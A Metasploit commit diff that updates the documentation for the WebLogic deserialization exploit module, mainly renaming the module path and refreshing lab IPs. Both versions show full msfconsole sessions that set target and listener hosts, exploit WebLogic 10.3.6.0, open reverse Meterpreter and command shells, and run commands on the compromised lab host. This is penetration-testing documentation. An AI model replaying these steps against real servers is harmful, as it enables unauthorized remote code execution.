Land #10568, Update weblogic module docs

2018-08-31 14:05:46 -05:00 · 2018-08-31 14:05:46 -05:00 · 34944ff5be
parent 21f2b5e298 e49435a766
commit 34944ff5be
1 changed files with 20 additions and 20 deletions
--- a/documentation/modules/exploit/multi/misc/weblogic_deserialize.md
+++ b/documentation/modules/exploit/multi/misc/weblogic_deserialize.md
@ -26,10 +26,12 @@ msf5 exploit(multi/misc/weblogic_deserialize) > set srvhost 172.22.222.121
 srvhost => 172.22.222.121
 msf5 exploit(multi/misc/weblogic_deserialize) > set srvport 8888
 srvport => 8888
+msf5 exploit(multi/misc/weblogic_deserialize) > set target 1
+target => 1
 msf5 exploit(multi/misc/weblogic_deserialize) > run
 [*] Exploit running as background job 0.
-msf5 exploit(multi/misc/weblogic_deserialize) > 
-[*] Started reverse TCP handler on 172.22.222.121:4444 
+msf5 exploit(multi/misc/weblogic_deserialize) >
+[*] Started reverse TCP handler on 172.22.222.121:4444
 [*] Sending stage (179779 bytes) to 172.22.222.175
 [*] Meterpreter session 1 opened (172.22.222.121:4444 -> 172.22.222.175:49908) at 2018-08-08 17:53:07 -0500
 sessions -i 1
@ -43,41 +45,39 @@ System Language : en_US
 Domain          : WORKGROUP
 Logged On Users : 2
 Meterpreter     : x86/windows
-meterpreter > 
+meterpreter >
 ```

 ### Tested on Ubuntu 14.04 LTS x64 running Oracle Weblogic Server 10.3.6.0 on Sun SDK 1.6.0_29
 ```
-msf5 > use exploit/windows/misc/weblogic_deserialize
-msf5 exploit(windows/misc/weblogic_deserialize) > set rhosts 172.22.222.205
+msf5 > use exploit/multi/misc/weblogic_deserialize
+msf5 exploit(multi/misc/weblogic_deserialize) > set rhosts 172.22.222.205
 rhosts => 172.22.222.205
-msf5 exploit(windows/misc/weblogic_deserialize) > set lhost 172.22.222.197
-lhost => 172.22.222.197
-msf5 exploit(windows/misc/weblogic_deserialize) > set srvhost 172.22.222.197 
-srvhost => 172.22.222.197
-msf5 exploit(windows/misc/weblogic_deserialize) > set verbose true
+msf5 exploit(multi/misc/weblogic_deserialize) > set srvhost 172.22.222.207
+srvhost => 172.22.222.207
+msf5 exploit(multi/misc/weblogic_deserialize) > set lhost 172.22.222.207
+lhost => 172.22.222.207
+msf5 exploit(multi/misc/weblogic_deserialize) > set verbose true
 verbose => true
-msf5 exploit(windows/misc/weblogic_deserialize) > check
+msf5 exploit(multi/misc/weblogic_deserialize) > check

 [+] 172.22.222.205:7001 - Detected Oracle WebLogic Server Version: 10.3.6.0
 [*] 172.22.222.205:7001 The target appears to be vulnerable.
-msf5 exploit(windows/misc/weblogic_deserialize) > run
-[*] Exploit running as background job 2.
-msf5 exploit(windows/misc/weblogic_deserialize) > 
-[*] Started reverse TCP handler on 172.22.222.197:4444 
+msf5 exploit(multi/misc/weblogic_deserialize) > run
+[*] Exploit running as background job 0.
+msf5 exploit(multi/misc/weblogic_deserialize) >
+[*] Started reverse TCP handler on 172.22.222.207:4444
 [*] 172.22.222.205:7001 - Sending handshake...
 [*] 172.22.222.205:7001 - Sending client object payload...
 [*] 172.22.222.205:7001 - Comparing host: 172.22.222.205
 [*] 172.22.222.205:7001 - Sending payload to client: 172.22.222.205
 [*] 172.22.222.205:7001 - Comparing host: 172.22.222.205
-[*] Command shell session 1 opened (172.22.222.197:4444 -> 172.22.222.205:35904) at 2018-08-28 10:59:20 -0500
+[*] Command shell session 1 opened (172.22.222.207:4444 -> 172.22.222.205:37168) at 2018-08-30 06:10:31 -0500
 [*] 172.22.222.205:7001 - Server stopped.
-msf5 exploit(windows/misc/weblogic_deserialize) > 
-sessions -i 1
+
+msf5 exploit(multi/misc/weblogic_deserialize) > sessions -i 1
 [*] Starting interaction with 1...

-whoami
-msfdev
 uname -a
 Linux ubuntu 4.4.0-134-generic #160~14.04.1-Ubuntu SMP Fri Aug 17 11:07:07 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 ```